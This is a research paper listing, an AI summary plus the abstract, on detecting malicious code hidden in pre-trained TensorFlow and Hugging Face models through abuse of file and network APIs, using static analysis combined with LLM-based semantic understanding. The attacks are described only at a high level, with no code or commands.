🤖 AI Summary
This study addresses the critical security risk of semantic misuse of deep learning (DL) framework APIs—such as file I/O and network communication functionalities in TensorFlow—that can be exploited to embed malicious code in publicly distributed models, enabling remote code execution or data exfiltration. Existing detection tools, which rely primarily on syntactic features, often fail to identify such semantically sophisticated attacks. To bridge this gap, this work presents a novel detection framework that integrates static program analysis with large language model (LLM)-based semantic understanding, specifically tailored for the TensorFlow and Hugging Face ecosystems. Through empirical evaluation, the authors reproduce multiple stealthy attack variants and demonstrate that current platform scanners frequently miss these threats. Their approach effectively identifies high-risk API usage patterns, substantially improving the detection of malicious DL models.
📝 Abstract
According to Gartner, more than 70% of organizations will have integrated AI models into their workflows by the end of 2025. In order to reduce cost and foster innovation, it is often the case that pre-trained models are fetched from model hubs like Hugging Face or TensorFlow Hub. However, this introduces a security risk where attackers can inject malicious code into the models they upload to these hubs, leading to various kinds of attacks including remote code execution (RCE), sensitive data exfiltration, and system file modification when these models are loaded or executed (predict function). Since AI models play a critical role in digital transformation, this would drastically increase the number of software supply chain attacks. While there are several efforts at detecting malware when deserializing pickle based saved models (hiding malware in model parameters), the risk of abusing DL APIs (e.g. TensorFlow APIs) is understudied. Specifically, we show how one can abuse hidden functionalities of TensorFlow APIs such as file read/write and network send/receive along with their persistence APIs to launch attacks. It is concerning to note that existing scanners in model hubs like Hugging Face and TensorFlow Hub are unable to detect some of the stealthy abuse of such APIs. This is because scanning tools only have a syntactically identified set of suspicious functionality that is being analysed. They often do not have a semantic-level understanding of the functionality utilized. After demonstrating the possible attacks, we show how one may identify potentially abusable hidden API functionalities using LLMs and build scanners to detect such abuses.